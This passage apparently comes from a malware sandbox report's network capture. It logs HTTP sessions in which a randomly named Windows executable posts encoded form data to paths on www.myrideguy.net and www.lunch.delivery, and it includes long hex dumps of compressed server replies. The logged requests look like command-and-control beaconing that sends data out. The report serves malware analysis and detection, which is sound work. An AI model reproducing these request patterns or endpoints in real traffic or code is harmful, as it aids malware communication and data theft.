ec 6a 38 0c 3d ea e0 98 06 fe b6 e7 fe ed 7b 14 [TRUNCATED]
                                                                                                                    Data Ascii: 4599}kw?e^tw8N>$IHe{vM"`0_>^r\v5/f?PjFqF`d^iP`w7cc0H}<;s|<&%0`j]POc==rGvMoh'PHGN0F:Gl!E >.<@'SK\l|xiKFj8={r<E`^cZOm[6j?#;@Di`aJ`[@02a2$}=_b(Fc2o=
                                                                                                                    Oct 24, 2024 05:09:29.234935045 CEST1236INData Raw: 32 26 7e 5c a0 01 e9 27 31 19 2f c7 fe ca 93 a0 61 10 51 a8 bc d6 33 6b 1a 08 56 eb 69 ef 83 31 49 89 2d 42 a3 d5 34 9f dc 0a 44 cb eb 92 d3 bc af ad c3 73 19 8b ca b9 95 73 fe 31 88 d1 71 90 f8 2e e4 33 72 43 83 24 5a c6 9f c2 d9 6f 2a 6f 9f d8
                                                                                                                    Data Ascii: 2&~\'1/aQ3kVi1I-B4Dss1q.3rC$Zo*oWdSK%S`Q ]=5D:y23qB)KxR3ThtYihBv_^P/jRr>IV-L#VZA-1e
                                                                                                                    Oct 24, 2024 05:09:29.234961987 CEST1236INData Raw: 00 cc ff 8b cb f7 af bb da 84 51 98 6a e8 e3 c0 25 bd 1b c2 60 ba e2 e9 1e d3 7e ab cd 14 e4 e3 d3 92 92 cc d3 7e bb 63 41 8c 63 d2 33 3b 86 4b 86 2b 76 27 47 e8 74 36 88 ad d0 95 52 fb b0 2d a6 85 d1 f6 24 08 f8 94 93 39 64 1b 47 11 89 a3 6d c7
                                                                                                                    Data Ascii: Qj%`~~cAc3;K+v'Gt6R-$9dGmFu[1`g<D,s9[$2~Nlkc2=0qzT(7S{8A3v=[eY\Y3)LJc&9*9\,C1-aXjxfi%DD14g]'bh5
                                                                                                                    Oct 24, 2024 05:09:29.234981060 CEST1236INData Raw: 03 37 bb 05 f4 3e df d2 1f 61 77 6d de 6d db e8 b6 3a b5 57 b6 e9 b8 ce a0 80 7c 4c 5d 3f 53 d8 b5 b4 c7 32 ec 8e 59 7b 65 75 da 8d 81 b3 25 b6 88 b2 0d a8 bc d7 96 77 a1 f8 c6 86 d8 66 aa 82 b1 d2 61 46 54 9f 1b 85 4a b8 dc ae cd 37 26 29 47 60
                                                                                                                    Data Ascii: 7>awmm:W|L]?S2Y{eu%wfaFTJ7&)G`4JM?_/R{OT(1/xE|1K|=|U?p<Yro[XvR"Yu*}Ogreq<`czok-8(-6N
                                                                                                                    Oct 24, 2024 05:09:29.235018015 CEST800INData Raw: 8d 03 24 e6 f5 b5 59 47 4a 79 2c e2 ec cc 05 cb 68 ac c7 a1 3a 7e 3e 1f 8f 4a 74 df aa 5c 66 d5 7a 02 26 a5 84 9e 86 47 97 e2 61 e0 63 2f 9b 53 00 8b ea 84 65 2e 8b 88 af 06 e7 b3 90 e2 5b cc a7 a4 b4 32 9f 0f 6f f1 65 9c 2a ed de 5c 55 a8 cd 95
                                                                                                                    Data Ascii: $YGJy,h:~>Jt\fz&Gac/Se.[2oe*\UxU<qZ2V>TW0KO&B*.c~6Lk}uj.Nrl/ IF\8]s=ZE0Z^t:l"h^0*7!^Qei=d
                                                                                                                    Oct 24, 2024 05:09:29.235037088 CEST1236INData Raw: 3b 75 aa 1a f1 b6 76 9e b1 89 61 c4 5c 89 a3 7c 68 dd da e1 a7 be 51 a9 47 e6 41 32 88 9f cb b9 2f 67 cb e3 39 88 9f ce 51 af 56 c8 46 b5 72 21 10 33 8d 36 ff 5a 43 2e bd c9 b7 8c a1 e1 cb 1c 40 47 97 1c c0 57 01 19 24 2c 46 36 1b 22 82 56 59 c5
                                                                                                                    Data Ascii: ;uva\|hQGA2/g9QVFr!36ZC.@GW$,F6"VY,U.;j$Ef2*T|+IBRz&TRqne]Ap+.|k~dQu(OXVJT%x7B1zvfWNJ
                                                                                                                    Oct 24, 2024 05:09:29.235064030 CEST1236INData Raw: 22 84 28 82 29 07 43 97 44 c2 03 95 78 5a 5a 1a ae 79 83 ef 3c 90 58 dc f5 06 49 8a 29 84 0b df 54 11 f2 93 36 90 20 82 5f 9b 69 5d 0b 86 2e b5 86 05 19 96 2e 81 83 bc ea 58 2a 9e 03 01 b9 19 ea 54 aa 39 e1 ec 5e 38 24 2e 86 13 92 5c e9 a9 28 f9
                                                                                                                    Data Ascii: "()CDxZZy<XI)T6 _i]..X*T9^8$.\(O$4OEf)u:H#j/1eg^>`'CV'ZBqzuTCxcUJ>{T}} oTgwFO=l~{d{
                                                                                                                    Oct 24, 2024 05:09:29.235085964 CEST1236INData Raw: 13 62 73 c0 9d 39 07 22 f3 51 f2 fb 82 aa 41 72 6f e9 02 98 39 5a 54 54 21 05 3e 61 de ac 38 a4 2f 5e ba 5a 8b 14 25 c4 62 e5 99 81 53 5d b1 0b c0 f2 c6 4c 5d 89 0b 40 17 1a 31 be 33 c4 9f b0 cb a5 d7 58 06 98 3d 4b c8 5d a3 73 20 55 47 6c 6b 2e
                                                                                                                    Data Ascii: bs9"QAro9ZTT!>a8/^Z%bS]L]@13X=K]s UGlk.Tjve`sqgmJ^5w|3iIeUrTEJ4\L4)59>{[}/{F;7`!+N?($|Dw
                                                                                                                    Oct 24, 2024 05:09:29.235110044 CEST540INData Raw: 90 88 1b dc 3f 45 15 b9 e9 71 78 cb 89 5f 7f 8a 5a 8d a7 3a 76 9c 20 f1 a1 62 67 53 94 7e 3c 5f dd f8 00 cf 73 f5 74 39 fe 47 55 55 59 e3 fe 29 9a 2e 22 ec 86 3a 24 da d6 f6 2e d2 9f 7f 8e 7a 8d 82 10 ea 34 0a c2 3f 45 7d 62 b0 82 e3 c0 a7 d8 83
                                                                                                                    Data Ascii: ?Eqx_Z:v bgS~<_st9GUUY).":$.z4?E}bT>Ct?/Y3NEP~o!\|qa7j4EYZfU1's]];yN=cp(>|a[rKB7zd!rnw5Z
                                                                                                                    Oct 24, 2024 05:09:29.235131025 CEST1236INData Raw: 3b e2 df 06 6a a6 ad d4 4a b3 d3 ef f7 5d de 98 cd c3 6e bd 63 b6 5a 12 4e b4 12 14 37 4c cb ea c2 b7 6d b6 2d d4 aa 37 3a ed 76 e7 14 04 da 68 34 21 bd d1 69 77 40 f6 66 c3 e6 b5 35 6c d3 82 f4 76 07 ca 99 f5 66 d3 4c f1 75 9b 5c 1a 4d 03 e8 b5
                                                                                                                    Data Ascii: ;jJ]ncZN7Lm-7:vh4!iw@f5lvfLu\M-7LQnMowVlvnAid]NJY(|fuF)3bRb?H\;PNO4\zN%u=?{gR@V[cFw*8q
                                                                                                                    Oct 24, 2024 05:09:29.240726948 CEST1236INData Raw: fc 76 0d 15 2e f1 f8 1e bd 16 97 1d cd 41 0a e8 f8 5d 39 5b 9b 00 27 cf 78 be 78 aa e3 ba c5 03 e8 ca 31 de 47 de 8f c1 c9 8d 82 e0 3a 2a 53 e0 89 4f 82 1e ee 7f 28 63 87 b4 39 c8 8b 10 3a bf d8 41 db 7b 39 09 eb 1c 51 44 e2 53 38 30 4a 8e 70 8c
                                                                                                                    Data Ascii: v.A]9['xx1G:*SO(c9:A{9QDS80Jp7z@b^>pOGDP{G0(-Z)"a3QeR}nZCz&Dj |>=fd-SatREC$[Acfi


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    39192.168.2.45004168.66.226.116805568C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 24, 2024 05:09:30.362407923 CEST10900OUTPOST /kgyd/ HTTP/1.1
                                                                                                                    Host: www.myrideguy.net
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Origin: http://www.myrideguy.net
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 10300
                                                                                                                    Referer: http://www.myrideguy.net/kgyd/
                                                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
                                                                                                                    Data Raw: 51 7a 6a 3d 62 73 66 6e 49 34 4c 52 45 52 53 6d 76 70 46 38 58 44 53 64 68 54 4b 4a 39 59 4a 75 46 59 50 63 42 30 48 79 67 2b 6b 68 2b 4d 74 4f 39 46 38 44 36 66 4d 4e 4f 67 55 4d 78 62 79 75 66 52 6d 4e 69 74 4c 45 65 69 47 75 38 72 39 34 34 62 4a 53 66 79 48 74 5a 48 43 33 31 79 32 53 75 31 59 72 53 72 71 54 6e 4f 75 54 70 66 68 6a 43 31 6d 50 36 4e 31 73 4d 36 64 58 58 6c 74 2b 65 34 39 45 2b 7a 65 6b 6d 72 39 44 61 35 31 69 70 35 54 4a 2b 65 4b 6a 50 67 2b 62 65 37 72 30 66 71 64 53 67 74 35 46 4f 4c 39 4e 2f 32 6c 41 72 44 4c 2f 61 53 45 35 41 6a 56 70 73 31 6b 42 51 4d 46 42 57 4c 76 51 61 71 63 59 66 50 68 50 30 75 50 50 41 35 56 6c 30 64 68 6c 4f 6c 68 37 6f 74 71 4a 67 78 31 4f 6e 31 6f 63 61 70 72 44 48 50 6d 54 77 58 59 67 69 2f 4b 73 49 74 67 5a 6c 6b 6d 4f 71 79 76 55 4c 75 74 56 6c 4f 6a 65 48 52 47 75 67 4e 39 30 34 70 44 6a 54 54 73 58 36 61 79 76 69 2b 4a 6c 47 70 63 52 5a 66 76 64 69 66 52 4b 57 78 2f 32 69 63 65 41 47 43 59 66 72 78 5a 71 47 66 78 6e 59 35 74 5a 68 68 2f 67 35 31 [TRUNCATED]
                                                                                                                    Data Ascii: Qzj=bsfnI4LRERSmvpF8XDSdhTKJ9YJuFYPcB0Hyg+kh+MtO9F8D6fMNOgUMxbyufRmNitLEeiGu8r944bJSfyHtZHC31y2Su1YrSrqTnOuTpfhjC1mP6N1sM6dXXlt+e49E+zekmr9Da51ip5TJ+eKjPg+be7r0fqdSgt5FOL9N/2lArDL/aSE5AjVps1kBQMFBWLvQaqcYfPhP0uPPA5Vl0dhlOlh7otqJgx1On1ocaprDHPmTwXYgi/KsItgZlkmOqyvULutVlOjeHRGugN904pDjTTsX6ayvi+JlGpcRZfvdifRKWx/2iceAGCYfrxZqGfxnY5tZhh/g51UiGN2fs+BL4cJSKYgWIFWrvrlrBqhDrzLuZ9HNXnhmF0/6AXJCeCgo3ELZITmwwXj66f7URLgExdTlPv467cSokKDA/IZ02YbGNPPP3anakGM83kZ2ip0ZI+SykBZH+SEK41OvIXUZJ6Hcvp0mDz2iGEWbateYphX1Wp+t/fB8WWPvVxzv2GB0YlWpnh6AKN8bH9FXURrFlOFgAtADFXEH1/ER4AAgNF5ITLzvfMDNhpHN+BQrYs7W1sKpbp3Wib1pmE9FbsjCWK+fLaVklSZSiBqRjeFya71ExvUtuu6yEM+58slORTWolZQGOnXytQG2lLuhEzehOocvE4Sa8f7q/SR+SFMi+y1ErZH1FgIFnxh/qKfytCCyYtPkP7CvmAXKUWzu6Q47ouJr4PKLQ5AOqIRh+bl4OL5eNGs40QLAK6kTEqvXAVEUG0ZyRhTQQxTP8oJApGk2+QkBLuJvj6IsKmSkO0k+x1M722M3AKeU0c684OH3Tx+Ni7dV6tpv13xAjrErjazbOk25vDlH960+lTd7ilfO/HSUUbzOo4L1o2qQYCxyTUj5xukzWsP5c0HPCBZ3++RD0GSmHmHwUqWzVJs3lt3H2iFpRKkYyLbuDfLsPQDnlN9UR/oscGRnD1Mwe/e/EpXezwq6SU8Z+zNdYzLNMvAM1WbI [TRUNCATED]
                                                                                                                    Oct 24, 2024 05:09:31.780839920 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                    Connection: close
                                                                                                                    x-powered-by: PHP/7.4.33
                                                                                                                    x-dns-prefetch-control: on
                                                                                                                    set-cookie: mailchimp_landing_site=https%3A%2F%2Fmyrideguy.net%2Fkgyd%2F; expires=Thu, 21-Nov-2024 03:09:31 GMT; Max-Age=2419200; path=/; secure; SameSite=Strict
                                                                                                                    x-litespeed-tag: b37_HTTP.404
                                                                                                                    expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                    content-type: text/html; charset=UTF-8
                                                                                                                    link: <https://myrideguy.net/wp-json/>; rel="https://api.w.org/"
                                                                                                                    x-litespeed-cache-control: no-cache
                                                                                                                    cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                                                                    transfer-encoding: chunked
                                                                                                                    content-encoding: gzip
                                                                                                                    vary: Accept-Encoding
                                                                                                                    date: Thu, 24 Oct 2024 03:09:31 GMT
                                                                                                                    server: LiteSpeed
                                                                                                                    strict-transport-security: max-age=63072000; includeSubDomains
                                                                                                                    x-frame-options: SAMEORIGIN
                                                                                                                    x-content-type-options: nosniff
                                                                                                                    Data Raw: 34 35 39 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 dc 7d 6b 77 db b8 d1 f0 e7 e4 9c f7 3f a0 cc f1 13 bb 15 65 5e 74 77 ec d6 97 38 f1 c6 4e dc d8 c9 3e bb cd 1e 1f 88 84 24 c4 14 c9 05 49 cb 8a eb ff fe 9e 01 48 02 a4 a8 8b 65 7b 9f 76 b7 4d 22 02 83 99 c1 60 30 00 06 03 e0 cd 5f 8e 3e 1d 5e fe 72 fe 16 8d e2 b1 b7 f7 f2 0d fc 83 5c ca 76 35 2f 66 1a f2 b0 3f dc d5 88 af 7f b9 d0 50 c8 c8 80 de ee 6a c1 b0 87 46 71 1c 46 bd ed ed 60 18 d6 c7 64 db 8f 5e 69 50 9a 60 77 ef e5 8b 37 63 12 63 e4 8c 30 8b 48 bc ab 7d b9 3c d6 3b 1a da ce 73 7c 3c 26 bb da 0d 25 93 30 60 b1 86 9c c0 8f 89 1f ef 6a 13 ea c6 a3 5d 97 dc 50 87 e8 fc a3 86 a8 4f 63 8a 3d 3d 72 b0 47 76 4d 8e e7 e5 8b 17 6f fe a2 eb 68 df f3 10 f5 d1 27 9f a0 8b b7 9f 50 a3 de ae 1b 48 47 98 06 11 09 ea 4e 30 46 ba be f7 ff 00 3a a6 b1 47 f6 de 6c 8b 7f 21 45 e1 84 05 fd 20 8e 14 3e fc 80 fa 2e b9 15 3c 17 40 87 c4 27 0c c7 01 53 a0 4b 5c 6c ee 9f 7c ba 78 fb 69 4b b0 93 e1 88 1c 46 c3 18 c5 d3 90 ec 6a 38 0c 3d ea e0 98 06 fe b6 e7 fe ed 7b 14 [TRUNCATED]
                                                                                                                    Data Ascii: 459f}kw?e^tw8N>$IHe{vM"`0_>^r\v5/f?PjFqF`d^iP`w7cc0H}<;s|<&%0`j]POc==rGvMoh'PHGN0F:Gl!E >.<@'SK\l|xiKFj8={r<E`^cZOm[6j?#;@Di`aJ`[@02a2$}=_b(Fc2o=
                                                                                                                    Oct 24, 2024 05:09:31.780910969 CEST212INData Raw: 32 26 7e 5c a0 01 e9 27 31 19 2f c7 fe ca 93 a0 61 10 51 a8 bc d6 33 6b 1a 08 56 eb 69 ef 83 31 49 89 2d 42 a3 d5 34 9f dc 0a 44 cb eb 92 d3 bc af ad c3 73 19 8b ca b9 95 73 fe 31 88 d1 71 90 f8 2e e4 33 72 43 83 24 5a c6 9f c2 d9 6f 2a 6f 9f d8
                                                                                                                    Data Ascii: 2&~\'1/aQ3kVi1I-B4Dss1q.3rC$Zo*oWdSK%S`Q ]=5D:y23qB)KxR3ThtYihBv_^P/jRr>I
                                                                                                                    Oct 24, 2024 05:09:31.780987978 CEST1236INData Raw: 56 0a 2d 4c a0 0a 23 c2 56 91 5a 41 ad ee ef 7f bb 07 0b b6 2d e8 ee cd 31 be ba be f7 f2 65 6a e6 f6 26 d4 77 83 49 fd 6a e2 60 b4 8b d4 af 7f ff 1b fd eb b7 9d 1c d9 ff 7b f9 f2 8d 47 fd 6b c4 88 b7 fb da f5 23 1d 46 19 12 3b a3 d7 68 c4 c8 60
                                                                                                                    Data Ascii: V-L#VZA-1ej&wIj`{Gk#F;h`v`ObGIc@0D,v;4y`j~sp.G+0Wik^h@KQ##h4NStQL(P%CnHG_""15$a2M
                                                                                                                    Oct 24, 2024 05:09:31.781039000 CEST1236INData Raw: b6 6a b3 78 0a 66 69 25 44 cc 03 44 d6 13 31 34 83 67 5d 86 ec 27 62 68 06 cf ba 0c 35 9e 88 a1 19 3c eb 32 d4 7c 22 86 66 f0 ac cb 50 eb 89 18 9a c1 b3 1e 43 f3 47 de aa b5 1e c1 cc 29 4f 1d 4b b9 57 57 fd 24 8e 03 bf b0 66 35 8d f0 76 67 12 30
                                                                                                                    Data Ascii: jxfi%DD14g]'bh5<2|"fPCG)OKWW$f5vg0Wu:KWW:7wu_GMDFdgLoXt.`zfB;KYXdl3[u+qroY4YHu\pxwA&St?YE
                                                                                                                    Oct 24, 2024 05:09:31.781089067 CEST1236INData Raw: 3c 1a f6 60 63 7a d3 0c 6f 6b ca 9f 2d 9e a5 87 38 1e f5 28 b8 2d 36 9b c6 c6 d6 4e e6 80 02 6f 93 98 02 ea f0 bb b4 58 94 13 eb 9d 3c b6 00 f7 f9 00 49 32 b7 54 e6 2c 4b dd 3c a0 71 aa 67 64 96 e9 74 fa 3c 3b 9a b8 ae 2b ea 01 b3 51 65 7d 26 2b
                                                                                                                    Data Ascii: <`czok-8(-6NoX<I2T,K<qgdt<;+Qe}&+')tEtMQ0|1;koppq=r7#0{+F$B>,)XP$$XZKE"M]_0sQJ%,Ru$WBJJP
                                                                                                                    Oct 24, 2024 05:09:31.781136990 CEST636INData Raw: d5 5e 00 d2 30 2a 85 95 e7 37 21 bf 5e 51 f9 1c a2 65 f4 b2 1a ce 03 69 1b 3d 64 d7 ed ce 02 90 8e d1 43 cd ba d1 aa 00 19 61 37 98 c0 21 a5 38 61 d8 eb 21 08 0c 84 3f dd f0 16 f1 69 b5 51 43 e9 ff eb 56 59 c8 59 69 97 90 b0 87 4c 0b 3c ac f0 57
                                                                                                                    Data Ascii: ^0*7!^Qei=dCa7!8a!?iQCVYYiL<W(W:aJUeRN#5bqptZXa0-./$2hjLg=-Psg"qb..voK;3I5d;aOnrX`3gH)K\0
                                                                                                                    Oct 24, 2024 05:09:31.781188965 CEST1236INData Raw: 10 33 8d 36 ff 5a 43 2e bd c9 b7 8c a1 e1 cb 1c 40 47 97 1c c0 57 01 19 24 2c 46 36 1b 22 82 56 59 c5 ee 2c 83 55 fc 2e 3b 6a 24 7f 45 89 d9 05 e2 96 12 66 32 af 80 ba c4 dd 2a c4 9c 54 cc 92 97 cc c5 b6 f2 83 0b 10 7c 02 2b 8b d2 49 86 42 52 7a
                                                                                                                    Data Ascii: 36ZC.@GW$,F6"VY,U.;j$Ef2*T|+IBRz&TRqne]Ap+.|k~dQu(OXVJT%x7B1zvfWNJQV&)WWpVk0eR1Tu
                                                                                                                    Oct 24, 2024 05:09:31.781239986 CEST1236INData Raw: 86 05 19 96 2e 81 83 bc ea 58 2a 9e 03 01 b9 19 ea 54 aa 39 e1 ec 5e 38 24 2e 86 13 92 5c e9 a9 28 f9 b8 4f 1e 24 fe 34 4f 04 45 85 e4 14 f9 d2 17 82 66 d9 29 75 91 3a f5 07 f0 48 1d d1 23 87 05 9e 87 ea 6a 99 10 0f a9 2f de aa 03 05 c9 9b 31 95
                                                                                                                    Data Ascii: .X*T9^8$.\(O$4OEf)u:H#j/1eg^>`'CV'ZBqzuTCxcUJ>{T}} oTgwFO=l~{d{/&^X}GO'G0$1
                                                                                                                    Oct 24, 2024 05:09:31.781290054 CEST1236INData Raw: c0 f2 c6 4c 5d 89 0b 40 17 1a 31 be 33 c4 9f b0 cb a5 d7 58 06 98 3d 4b c8 5d a3 73 20 55 47 6c 6b 2e 54 c1 f9 6a 76 e7 c2 65 f7 16 80 60 1a 73 a1 9c 11 71 ae d3 67 09 17 d3 cd 6d 4a 5e 95 f9 35 81 77 7c 33 8c 15 d6 69 49 65 15 a8 85 95 55 e0 72
                                                                                                                    Data Ascii: L]@13X=K]s UGlk.Tjve`sqgmJ^5w|3iIeUrTEJ4\L4)59>{[}/{F;7`!+N?($|DwjXKH?/&xf7PTZ-
                                                                                                                    Oct 24, 2024 05:09:31.781342983 CEST1236INData Raw: 9a 2e 22 ec 86 3a 24 da d6 f6 2e d2 9f 7f 8e 7a 8d 82 10 ea 34 0a c2 3f 45 7d 62 b0 82 e3 c0 a7 d8 83 b6 ba 54 3e ff 14 f5 eb 43 74 97 3f dc d6 f6 0e c4 2f 59 ab ed c4 13 7f e5 33 4e e1 45 9a fd 50 7e 8b 9f 6f c0 e7 21 5c 85 7c 8a 99 71 08 61 37
                                                                                                                    Data Ascii: .":$.z4?E}bT>Ct?/Y3NEP~o!\|qa7j4EYZfU1's]];yN=cp(>|a[rKB7zd!rnw5Z)jU@ap`|ecXCn.45iN
                                                                                                                    Oct 24, 2024 05:09:31.786997080 CEST1236INData Raw: 56 df eb 2c ac f1 d2 cd cc a6 a3 db 75 1b 19 7a 0b de a4 d5 5b a8 85 0c 78 6d b5 de 84 6f 64 d6 6d 64 d7 db 9e 6e d7 3b 08 fe 98 75 93 ff b1 eb 1d 48 73 4c 54 ef 20 ab 6e 67 90 e9 bf 36 32 50 4b 07 0c 2d bd 75 61 b6 ea 36 6a 22 20 f7 63 6c f0 45
                                                                                                                    Data Ascii: V,uz[xmodmdn;uHsLT ng62PK-ua6j" clE[&2F[F_(BXj7UNJ't{=/bX[Q^#Z^4M1d8X0%900")a)??sc_tO_.tR1.O


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    40192.168.2.45004268.66.226.116805568C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 24, 2024 05:09:32.907213926 CEST532OUTGET /kgyd/?Znyl=2rnxDB&Qzj=Wu3HLPqvQhberYZQa2vA+jLd86RSCoLcCB7xsP8R/99k0A4wkukwLWUZ+Z7OJCWhofveZifw88127MBJWT7MfBvd7RqI/EwbWL2cnrCtj+ZcWXeu3tlvVIc= HTTP/1.1
                                                                                                                    Host: www.myrideguy.net
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
                                                                                                                    Oct 24, 2024 05:09:33.813411951 CEST987INHTTP/1.1 301 Moved Permanently
                                                                                                                    Connection: close
                                                                                                                    x-powered-by: PHP/7.4.33
                                                                                                                    x-dns-prefetch-control: on
                                                                                                                    set-cookie: mailchimp_landing_site=https%3A%2F%2Fmyrideguy.net%2Fkgyd%2F%3FZnyl%3D2rnxDB%26Qzj%3DWu3HLPqvQhberYZQa2vA%2BjLd86RSCoLcCB7xsP8R%2F99k0A4wkukwLWUZ%2BZ7OJCWhofveZifw88127MBJWT7MfBvd7RqI%2FEwbWL2cnrCtj%2BZcWXeu3tlvVIc%3D; expires=Thu, 21-Nov-2024 03:09:33 GMT; Max-Age=2419200; path=/; secure; SameSite=Strict
                                                                                                                    expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                    cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                    content-type: text/html; charset=UTF-8
                                                                                                                    x-redirect-by: WordPress
                                                                                                                    location: http://myrideguy.net/kgyd/?Znyl=2rnxDB&Qzj=Wu3HLPqvQhberYZQa2vA+jLd86RSCoLcCB7xsP8R/99k0A4wkukwLWUZ+Z7OJCWhofveZifw88127MBJWT7MfBvd7RqI/EwbWL2cnrCtj+ZcWXeu3tlvVIc=
                                                                                                                    x-litespeed-cache: miss
                                                                                                                    content-length: 0
                                                                                                                    date: Thu, 24 Oct 2024 03:09:33 GMT
                                                                                                                    server: LiteSpeed
                                                                                                                    strict-transport-security: max-age=63072000; includeSubDomains
                                                                                                                    x-frame-options: SAMEORIGIN
                                                                                                                    x-content-type-options: nosniff


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    41192.168.2.45004313.248.169.48805568C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 24, 2024 05:09:38.902848005 CEST801OUTPOST /qwed/ HTTP/1.1
                                                                                                                    Host: www.lunch.delivery
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Origin: http://www.lunch.delivery
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 200
                                                                                                                    Referer: http://www.lunch.delivery/qwed/
                                                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
                                                                                                                    Data Raw: 51 7a 6a 3d 36 7a 6e 68 54 76 43 79 73 71 2f 31 64 67 68 35 62 74 4b 70 49 4e 57 71 53 63 73 58 6a 57 43 41 37 71 32 6c 78 31 66 73 47 45 4c 31 38 6c 39 6a 4a 56 42 6b 4d 34 4d 50 5a 73 4f 55 36 49 70 48 66 45 61 44 62 72 4f 46 70 6c 52 76 36 52 47 34 57 39 6f 56 36 67 71 67 53 4c 75 54 75 74 5a 6b 39 6e 6a 72 6b 79 30 6d 37 4d 73 67 39 6d 43 30 77 73 35 2f 63 4f 77 39 55 2f 6c 74 68 76 75 38 63 54 44 68 51 4c 6e 39 71 59 70 4d 2b 79 31 45 48 6b 77 61 54 35 2f 6e 2f 48 5a 6c 50 36 64 52 39 35 71 64 69 54 65 45 6c 49 4b 30 53 54 71 32 41 52 54 69 43 63 4f 67 41 63 57 49 34 2b 73 50 30 51 3d 3d
                                                                                                                    Data Ascii: Qzj=6znhTvCysq/1dgh5btKpINWqScsXjWCA7q2lx1fsGEL18l9jJVBkM4MPZsOU6IpHfEaDbrOFplRv6RG4W9oV6gqgSLuTutZk9njrky0m7Msg9mC0ws5/cOw9U/lthvu8cTDhQLn9qYpM+y1EHkwaT5/n/HZlP6dR95qdiTeElIK0STq2ARTiCcOgAcWI4+sP0Q==


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    42192.168.2.45004413.248.169.48805568C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 24, 2024 05:09:41.457381010 CEST821OUTPOST /qwed/ HTTP/1.1
                                                                                                                    Host: www.lunch.delivery
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Origin: http://www.lunch.delivery
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 220
                                                                                                                    Referer: http://www.lunch.delivery/qwed/
                                                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
                                                                                                                    Data Raw: 51 7a 6a 3d 36 7a 6e 68 54 76 43 79 73 71 2f 31 65 44 70 35 63 4b 65 70 5a 74 57 70 4d 4d 73 58 74 32 43 45 37 74 2b 6c 78 33 7a 47 46 79 62 31 39 46 74 6a 62 6d 5a 6b 42 59 4d 50 53 4d 4f 52 30 6f 70 63 66 45 6e 38 62 70 61 46 70 6c 46 76 36 51 32 34 57 4f 77 55 36 77 71 69 4a 62 75 56 67 4e 5a 6b 39 6e 6a 72 6b 79 67 49 37 50 63 67 39 57 53 30 78 4f 42 38 41 65 77 36 45 66 6c 74 71 50 75 34 63 54 43 45 51 4f 48 58 71 64 74 4d 2b 7a 46 45 48 32 59 62 64 4a 2f 68 37 48 59 35 66 6f 4d 72 36 74 7a 49 74 67 47 39 71 70 37 55 58 56 37 73 52 67 79 31 51 63 71 54 64 62 66 38 31 39 52 47 76 65 70 46 66 2f 66 7a 6c 31 72 71 74 34 79 66 61 5a 4e 50 33 2f 55 3d
